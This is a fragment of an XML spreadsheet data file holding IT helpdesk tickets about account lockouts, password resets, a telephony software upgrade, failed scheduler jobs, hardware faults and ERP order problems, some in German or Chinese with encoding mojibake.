    <s v="navfgybz fuavxjzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the excel files generated by zsSID_5800 don't open on mobile devices of sales employees"/>
    <s v="see email attached for more details and contacts. check if the excel version or such can be adjusted or if there is an oss note._x000d__x000a_worse case we have to &quot;push&quot; mobile uers to use the reporting_tool version of open orders however opening the excel file is most likely more convenient for them."/>
    <s v="cpmaidhj elbaqmtp"/>
    <x v="20"/>
  </r>
  <r>
    <s v="berechtigung zeitwirtschaft av"/>
    <s v="hallo herr busse,_x000d__x000a__x000d__x000a_wÃ¼rden sie dies bitte via ticket an die it schicken bzw. an _x000d__x000a__x000d__x000a_help@company.com_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="pmweoxyq zrkjnydi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company-eu-deu-germany-e-b2-f2-press-buero-3550-access-sw01 switch is down since 6:25am on 08/16/16"/>
    <s v="company-eu-deu-germany-e-b2-f2-press-buero-3550-access-sw01 switch is down since 6:25am on 08/16/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="lean tracker error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fdmobjul.oicarvqt@gmail.com_x000d__x000a__x000d__x000a_i am unable to add lean event in to collaboration_platform lean tracker ,  getting below error message._x000d__x000a_request  you to resolve._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f7d9.0f9dd1a0]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="sojwqapz okihatrb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user id locked."/>
    <s v="_x000a__x000a_received from: utoegyqx.lhosidqg@gmail.com_x000a__x000a_please note , ess portal access for the below specified detail is locked again._x000a__x000a_employee name: raghu mg_x000a_employee id: 299678542._x000a_user name: mgr._x000a__x000a_the issue with this user id is it getting locked again and again._x000a_previously also we were facing the same issue, then the user id and password has been changed and it had worked for few months._x000a_now the issue has occurred again._x000a_the employee is getting error message : user authentication failed._x000a__x000a_seek support to resolve the issue._x000a__x000a_"/>
    <s v="utoegyqx lhosidqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software_2016r2_installation - upgrade - does not work after two restarts -  there is no application! empw8111340 a: /nt"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zjcsqtdn.jikyworg@gmail.com_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / with best "/>
    <s v="zjcsqtdn jikyworg"/>
    <x v="65"/>
  </r>
  <r>
    <s v="receiving server error in crm _ adoption score card "/>
    <s v="_x000d__x000a__x000d__x000a_received from: qklrdoba.qxivmbts@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_                please find below the snap of the error which i am receiving, while accessing the adoption scorecard :_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f7d3.7f7e2a70]_x000d__x000a__x000d__x000a_please do the needful._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qklrdoba qxivmbts"/>
    <x v="22"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wqfzjycu.omleknjd@gmail.com_x000d__x000a__x000d__x000a_hi deeghyupak,_x000d__x000a__x000d__x000a_re our phone call just now please can you stop immediately the update for telephony_software our pc's are unable to run telephony_software after the update._x000d__x000a__x000d__x000a_please see your list below_x000d__x000a__x000d__x000a_aghl8325615_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_nazarr_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_aghw8325419_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_israey_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications (64-bit)_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_aghw8325488_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_nahumo_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications (64-bit)_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_aghw8325491_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_tevkia_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_aghw8325639_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_pogredrty_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a__x000d__x000a_these are the affected pc's with issues._x000d__x000a__x000d__x000a_many "/>
    <s v="wqfzjycu omleknjd"/>
    <x v="32"/>
  </r>
  <r>
    <s v="attendance_tool password reset request "/>
    <s v="attendance_tool password reset request "/>
    <s v="pstlrmvf jokbeqnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vetkdblx.nsuwkraj@gmail.com_x000d__x000a__x000d__x000a_hi daghyunny,_x000d__x000a__x000d__x000a_please find the below pcs which are installed with old telephony_software applications, when we pulled report from patching_antivirus_sw._x000d__x000a__x000d__x000a_name_x000d__x000a__x000d__x000a_location_x000d__x000a__x000d__x000a_country_x000d__x000a__x000d__x000a_user_x000d__x000a__x000d__x000a_os name_x000d__x000a__x000d__x000a_name_x000d__x000a__x000d__x000a_install primary language_x000d__x000a__x000d__x000a_os architecture_x000d__x000a__x000d__x000a_deployment_x000d__x000a__x000d__x000a_aghl8325615_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_nazarr_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_32-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a_aghw8325419_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_israey_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications (64-bit)_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_64-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a_aghw8325488_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_nahumo_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications (64-bit)_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_64-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a_aghw8325491_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_tevkia_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_32-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a_aghw8325639_x000d__x000a__x000d__x000a_ israel_x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_pogredrty_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_32-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a_agvw8325504_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_israel_x000d__x000a__x000d__x000a_sokdelfgty_x000d__x000a__x000d__x000a_windows 7 professional_x000d__x000a__x000d__x000a_ic user applications_x000d__x000a__x000d__x000a_english_x000d__x000a__x000d__x000a_32-bit_x000d__x000a__x000d__x000a_patching_antivirus_sw_x000d__x000a__x000d__x000a__x000d__x000a_we have scheduled the new version upgrade for the pcs which are installed with old telephony_software application._x000d__x000a__x000d__x000a_"/>
    <s v="vetkdblx nsuwkraj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad account lock out "/>
    <s v="ad account lock out "/>
    <s v="upiyobvj lwohuizr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new order--mm# 2694571 dmhpm045 / mm# 2695539  mb033"/>
    <s v="from: crysyhtal xithya _x000d__x000a_sent: tuesday, august 16, 2016 1:13 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: cindy wanrtyg; marftgytin xia_x000d__x000a_subject: tfw: ç­”å¤: new order--mm# 2694571 dmhpm045 / mm# 2695539 mb033_x000d__x000a_importance: high_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_can you please advise why the group costs for mm#2694571 and 2695539 from plant_122 and plant_335 are different?_x000d__x000a_taking mm#2694571 for example: @plant_122, group costs is $67.87, while @plant_335, group costs is $82.05? why? _x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_"/>
    <s v="smktofel etsoirbw"/>
    <x v="43"/>
  </r>
  <r>
    <s v="no intercompany "/>
    <s v="_x000a__x000a_received from: dumovtpj.ahgjsvoq@gmail.com_x000a__x000a_hi team,_x000a__x000a_we can not generate intercompany for delivery note 9168034926 the following error message appears, can you please_x000a_have a look:_x000a__x000a_[cid:image001.png@01d1f7b2.8e308980]_x000a__x000a_mit freundlichen grugermany / best "/>
    <s v="dumovtpj ahgjsvoq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="need help in installing tess"/>
    <s v="need help in installing tess"/>
    <s v="tvirflky febluink"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email-anzeige"/>
    <s v="_x000d__x000a__x000d__x000a_received from: trgqbeax.hfyzudql@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d1f7b0.223a83e0]_x000d__x000a__x000d__x000a__x000d__x000a_leider ist das feld â€žvon&quot; abhanden gekommen â˜¹_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_danke + viele grÃ¼ÃŸe_x000d__x000a_trgqbeax hfyzudql_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen |  best "/>
    <s v="trgqbeax hfyzudql"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to ess portal"/>
    <s v="not able to login to ess portal"/>
    <s v="xzwlnbfo plstfydx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zpdist_programdnty not allowing to distribute against planned orders and production orders"/>
    <s v="_x000d__x000a_hello chandruhdty, ebi,_x000d__x000a__x000d__x000a_iÂ´ve created an example in SID_1 for debugging an fixing. production order to receive is 226138271 // mm# 4289785._x000d__x000a_the issue does not only appear in case the user tries to ship against a planned order but also when trying to ship against a production order._x000d__x000a__x000d__x000a_shipping against planned orders:_x000d__x000a__x000d__x000a_it looks like zpdist_programdnty does only allow to ship against planned orders in case the planned order finish date is due or past due (purple example in the screenshot). in case the planned order finish date is not due (red example) zpdist_programdnty does not allow to ship against the planned order._x000d__x000a__x000d__x000a_the following things need to be changed:_x000d__x000a__x000d__x000a_- zpdist_programdnty should allow to force the shipment against planned orders even though the planned order is not due (just like zpdist_programdnty does for stock transfer orders)_x000d__x000a_- zpdist_programdnty should use the planned order start date rather than the planned order finish date to determine whether the planned order is due_x000d__x000a__x000d__x000a_shipping against production orders:_x000d__x000a__x000d__x000a_it looks like zpdist_programdnty does only allow to ship against production orders in case the basic finish date of the production order is due or past due (blue example). in case the basic finish date of the production order is not due (yellow example) zpdist_programdnty does not allow to ship against the production order._x000d__x000a__x000d__x000a_the following things need to be changed:_x000d__x000a__x000d__x000a_- zpdist_programdnty should allow to force the shipment against production orders even though the production order is not due (just like zpdist_programdnty does for stock transfer orders)_x000d__x000a_- zpdist_programdnty should use the basic start date (which is already shown in the transaction) rather than the basic finish date to determine whether the production order is due"/>
    <s v="cfajzero vlygoksi"/>
    <x v="17"/>
  </r>
  <r>
    <s v="windows system doesn't start"/>
    <s v="windows system doesn't start"/>
    <s v="pwksivmq dbxajims"/>
    <x v="31"/>
  </r>
  <r>
    <s v="wifi on big meetings is not stable in the meeting room"/>
    <s v="if we have a meeting at switzerland with a lot of participants, like today, the wifi is not stable. the users will get interrupts frequently. i do not have the possibility to check how much users are connected to which ap for analyzing the problem. "/>
    <s v="ustvaifg hmzfewks"/>
    <x v="32"/>
  </r>
  <r>
    <s v="nicht gebuchte anzahlungsrechnungen company 5417 - vfx3 -"/>
    <s v="siehe beigefÃ¼gte e-mail"/>
    <s v="hgufmidr mfobkyun"/>
    <x v="9"/>
  </r>
  <r>
    <s v="erp SID_34 account lock out issue"/>
    <s v="erp SID_34 account lock out issue"/>
    <s v="wjsfbpuv lcpdfihr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop power issue"/>
    <s v="laptop is not getting on "/>
    <s v="yjxuqdto sivnzgok"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ç­”å¤: help for mm#4866474 24800776"/>
    <s v="_x000d__x000a__x000d__x000a_received from: windy.shi@company.com_x000d__x000a__x000d__x000a_dearsï¼Œ_x000d__x000a_how about the status now ?_x000d__x000a_this shipment is urgent required._x000d__x000a_"/>
    <s v="tycludks cjofwigv"/>
    <x v="5"/>
  </r>
  <r>
    <s v="change &quot;volunteer tracker&quot; "/>
    <s v="_x000a__x000a_received from: fmjeaoih.ndyezlkb@gmail.com_x000a__x000a_hi all,_x000a_i would need two edits to be made to the volunteer tracker form_x000a_#wa=wsignin1.0_x000a__x000a_please add two fields beneath facilitator/contact person which should be named:_x000a__x000a_name of organization:_x000a__x000a_organization's address:_x000a__x000a__x000a_and please add at the very end:_x000a_please send the non- profit verification document to communication@company.com&lt;mailto:communication@company.com&gt;._x000a__x000a_please note that the volunteer tracker should be accessible to all employees,_x000a_i set the permissions accordingly._x000a_"/>
    <s v="fmjeaoih ndyezlkb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="loaner laptops germany location germany   required "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ubiqcrvy.mxjcnqfs@gmail.com_x000d__x000a__x000d__x000a_dear it-team,_x000d__x000a__x000d__x000a_i would please need loaner laptops for our consultant from bank for the below period:_x000d__x000a__x000d__x000a_12th september 2016 â€“ 15th september 2016                    hzptilsw wusdajqv / bank consultant_x000d__x000a__x000d__x000a_19th september 2016 â€“ 20th september 2016                    jrilgbqu kbspjrod / bank consultant_x000d__x000a__x000d__x000a_10th october 2016 â€“ 11th october 2016                              hzptilsw wusdajqv / bank consultant_x000d__x000a_10th october 2016 â€“ 11th october 2016                              wpakylnj wdtsyuxg / bank consultant_x000d__x000a__x000d__x000a_all three consultant should still have a valid erp and microsoft log in password. fyi - our bank consultant will do_x000d__x000a_a huge update in september and october for our erp payment management and autobank tool._x000d__x000a__x000d__x000a_could you please prepare the laptops accordingly and confirm if we will get the loaner laptops please._x000d__x000a_i would pick them up on the mentioned dates above by steffen rÃ¶del._x000d__x000a__x000d__x000a_if there is any problem please let me know._x000d__x000a__x000d__x000a_many "/>
    <s v="ubiqcrvy mxjcnqfs"/>
    <x v="28"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wqfzjycu.omleknjd@gmail.com_x000d__x000a__x000d__x000a_hi deeghyupak,_x000d__x000a__x000d__x000a_why are you running telephony_software upgrade on pc agvw8325504 when it is not used for telephony_software?_x000d__x000a__x000d__x000a_with "/>
    <s v="wqfzjycu omleknjd"/>
    <x v="65"/>
  </r>
  <r>
    <s v="cannot access SID_1"/>
    <s v="hello it,_x000d__x000a__x000d__x000a_i cannot login to SID_1 anymore, see attachment._x000d__x000a_please fix it for user id hannas and meixni_x000d__x000a__x000d__x000a_"/>
    <s v="jwqyxbzs adpvilqu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="support fÃ¼r umzug \qvncizuf ueiybanz"/>
    <s v="support fÃ¼r umzug \qvncizuf ueiybanz"/>
    <s v="qvncizuf ueiybanz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit EU_tool \obqridjk ugelctsz"/>
    <s v="probleme mit EU_tool \obqridjk ugelctsz"/>
    <s v="obqridjk ugelctsz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="virus found"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ynsqjehx.kqgrsawl@gmail.com_x000d__x000a__x000d__x000a_hi it team,_x000d__x000a__x000d__x000a_pls see how this can be removed? happened for the last 2 days._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d1f7cd.2a3cf790]_x000d__x000a__x000d__x000a_best "/>
    <s v="ynsqjehx kqgrsawl"/>
    <x v="49"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? 5018083414/00001_x000d__x000a__x000d__x000a_what material or item number? 6471853_x000d__x000a__x000d__x000a_what warehouse location? plant_108 to plant_168_x000d__x000a__x000d__x000a_issue description / error message? &quot;no message&quot;"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="5"/>
  </r>
  <r>
    <s v="windows account lock out "/>
    <s v="windows account lockout "/>
    <s v="gbaeniou svltmagu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for xqkydoat.bveiyclr@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: tuesday, august 16, 2016 10:26 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: ragsbdhryu:request to reset microsoft online services password for xqkydoat.bveiyclr@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ xqkydoat.bveiyclr@gmail.com _x000a_â€¢ first name: jagthyin bhughjdra _x000a_â€¢ last name: babanlal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xqkydoat bveiyclr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem mit start in outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ptuchwad.yzvrlcqa@gmail.com_x000d__x000a__x000d__x000a_hallo_x000d__x000a__x000d__x000a_kann auf rechner outlook nicht starten und crm synchronisiert stundenlang_x000d__x000a_dadurch werden auch andere dinge geblockt ( engineering_tool z.b.)_x000d__x000a__x000d__x000a_bitte um hilfe - sitze am rechner_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ssen_x000d__x000a_-uwe schrÃ¶ck_x000d__x000a_technische beratung und verkauf_x000d__x000a_ptuchwad.yzvrlcqa@gmail.com&lt;mailto:ptuchwad.yzvrlcqa@gmail.com&gt;_x000d__x000a_mobil 0175 4356 741&lt;tel:0175%204356%20741&gt;_x000d__x000a__x000d__x000a_company deutschland gmbh / max-planck-straÃŸe 13 / d-61381 germany /www.company.com&lt;_x000d__x000a__x000d__x000a_company deutschland gmbh_x000d__x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, harald mÃ¤nnlein_x000d__x000a_sitz der gesellschaft: germany/hgermany â€“ registergerirtcht: bad homburg/hgermany  hrb 7492_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d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_x000d__x000a_[#+company/posts&gt;  [_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="ptuchwad yzvrlcqa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po error language"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xjvubmlq.vyamhjip@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a_could you please help to check the reason of  po error language ._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f2f9.96a10ad0]_x000d__x000a__x000d__x000a_with best "/>
    <s v="xjvubmlq vyamhjip"/>
    <x v="29"/>
  </r>
  <r>
    <s v="telephony_software software 2016 upgrade for user &quot;laijuttr&quot;"/>
    <s v="i am not able to find the interaction desktop icon in my pc after installation.  even the old version got deleted.  please assist.  "/>
    <s v="wyxqkzmf urigtqnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook spell check error - repeated issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_[cid:image004.png@01d1f7af.e02c9290][cid:image005.jpg@01d1f7af.e02c9290]_x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2600"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2600 at 08/16/16 01:35:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2584"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2584 at 08/16/16 01:31:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2599"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2599 at 08/16/16 01:31:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="jebpqcys njcrzhdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="wqfzjycu omleknjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="upiyobvj lwohuizr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="xmnvhfoa lkemcwrf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="recall: re:ticket_no1541701 - please reopen"/>
    <s v="_x000a__x000a_received from: duwvesim.cixqbmfr@gmail.com_x000a__x000a_narefgttndra shigthyuva would like to recall the message, &quot;re:ticket_no1541701 - please reopen&quot;._x000a__x000a__x000a_"/>
    <s v="duwvesim cixqbmfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop volume is not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rvsbtxue.cdrwsymj@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_my laptop dell precision m4700 volume has stopped working. not sure whether the problem is with any drivers. please help as i have to attend few skype sessions this week._x000d__x000a__x000d__x000a_best "/>
    <s v="rvsbtxue cdrwsymj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="outlook spell check not working - repeated issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_pl. find the spell check error in the outlook._x000d__x000a_this is a repeated error, time &amp; again observed._x000d__x000a__x000d__x000a_need your attention &amp; permanent solution._x000d__x000a__x000d__x000a_[cid:image002.jpg@01d1f79e.28cd4650]_x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="dell battery failure."/>
    <s v="-kds sw11-services &lt;-kds.sw11-services@company.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="18"/>
  </r>
  <r>
    <s v=" mm# 1876905"/>
    <s v="from: -kds sw11-services _x000d__x000a_sent: tuesday, august 16, 2016 7:12 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: rxoynvgi ntgdsehl; -kds sw11-services; johthryugftyson hu_x000d__x000a_subject: fw: mm# 2987016_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a__x000d__x000a_please assist to create dn for the above mentioned mm. "/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="5"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="vwdghyai pjehycoz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable connect to engineering_tool "/>
    <s v="unable connect to engineering_tool "/>
    <s v="bfmlysrk olbthfqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: pp_EU_tool_netch_ap2"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: pp_EU_tool_netch_ap2 at 08/15/16 22:18:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="warehouse_vendor export service on HostName_802  is showing down in monitoring_tool monitoring tool"/>
    <s v="warehouse_vendor export service on HostName_802  is showing down in monitoring_tool monitoring tool"/>
    <s v="jloygrwh acvztedi"/>
    <x v="20"/>
  </r>
  <r>
    <s v="sipppr for help"/>
    <s v="dear itï¼Œ_x000a__x000a_ä»¥ä¸‹æ˜¯sippprçš„å…¥å£é“¾æŽ¥ã€‚_x000a__x000a__x000a__x000a_æˆ‘ç™»å½•è¿›åŽ»åŽ pdfæ–‡ä»¶ä¸èƒ½ç¼–è¾‘ï¼Œå¸®å¿™çœ‹çœ‹æ˜¯ä»€ä¹ˆé—®é¢˜ï¼Œadobe reader ç‰ˆæœ¬éœ€è¦æ›´æ–°ï¼Ÿ_x000a__x000a_å¦‚ä¸‹ä¸¤ä¸ªé“¾æŽ¥ï¼š_x000a__x000a_ _x000a__x000a_ _x000a__x000a__x000a_best "/>
    <s v="pfiyvdea uwbdsfmr"/>
    <x v="31"/>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oylukbas hzrbaksx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error login on to the SID_34 system."/>
    <s v="error login on to the SID_34 system._x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-user has tried the password_management_tool pwd manager._x000d__x000a_-unlocked and reset the erp id to&quot;daypay3&quot;._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="sraouxgh ehbomcvy"/>
    <x v="0"/>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mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="r173 schneeberger cnc nr.20123 / wza"/>
    <s v="programdntyme lassen sich teilweise nicht Ã¶ffnen, mal nach der festplatte schauen, _x000d__x000a_bitte um erledigung durch m. himghtmelreich (EU_tool   rep. nr,:39788)"/>
    <s v="zxopwyak zrbfkimx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="user needed help to login to erp SID_34"/>
    <s v="user needed help to login to erp SID_34._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the erp SID_34._x000d__x000a_-issue resolved."/>
    <s v="fjohugzb fhagjskd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: hr_tooldcvcgenratn"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: hr_tooldcvcgenratn at 08/15/16 17:02:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="help to change the windows password using password_management_tool password tool."/>
    <s v="help to change the windows password using password_management_tool password tool._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the password_manager_tool password tool and change the passwords._x000d__x000a_-help the user to sync the psswords to the company network._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="rzckwufx vgysnlab"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2827"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2827 at 08/15/16 16:07:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="29"/>
  </r>
  <r>
    <s v="expense report will not submit"/>
    <s v="_x000a__x000a_received from: ytqhfmwi.itnakpmc@gmail.com_x000a__x000a_my expense report will not submit. this is the 3rd expense report that i have not been able to submit. has required erp person/help desk to submit each time._x000a__x000a_[cid:image003.jpg@01d1f706.cbb3aeb0]_x000a_michjnfyele l. jenhntyns_x000a_plant manager_x000a_ytqhfmwi.itnakpmc@gmail.com&lt;mailto:ytqhfmwi.itnakpmc@gmail.com&gt;_x000a_"/>
    <s v="ytqhfmwi itnakpmc"/>
    <x v="68"/>
  </r>
  <r>
    <s v="return 7112594470 is held up in worklfow under approval vnhaycfo smkpfjzv- as of 4/27/16"/>
    <s v="vnhaycfo smkpfjzv is not with earthworks usa- customer order is being up held due to credit involved with this return. return has been received on 5/4/2016.  _x000d__x000a_"/>
    <s v="toeibhlp gukqjwnr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="robhyertyj lee"/>
    <s v="ron bell #21112660 has a 300 health savings acct deduction coming out of his paycheck yet he has elected zero.  can you please let me know why this is before the next u1 pay run."/>
    <s v="wrjaezov nouigrqb"/>
    <x v="51"/>
  </r>
  <r>
    <s v="dell 7350: the system keeps going in to a loop of shutting down.-urgent"/>
    <s v="dell 7350: the system keeps going in to a loop of shutting down._x000a_-advised the user to restart the pc . not happening._x000a_-service tag: 300811_x000a_-contact : _x000a_-os: win 8.1_x000a_"/>
    <s v="fhdgytup oxugrqeb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="adding purchasingupstreamsso members"/>
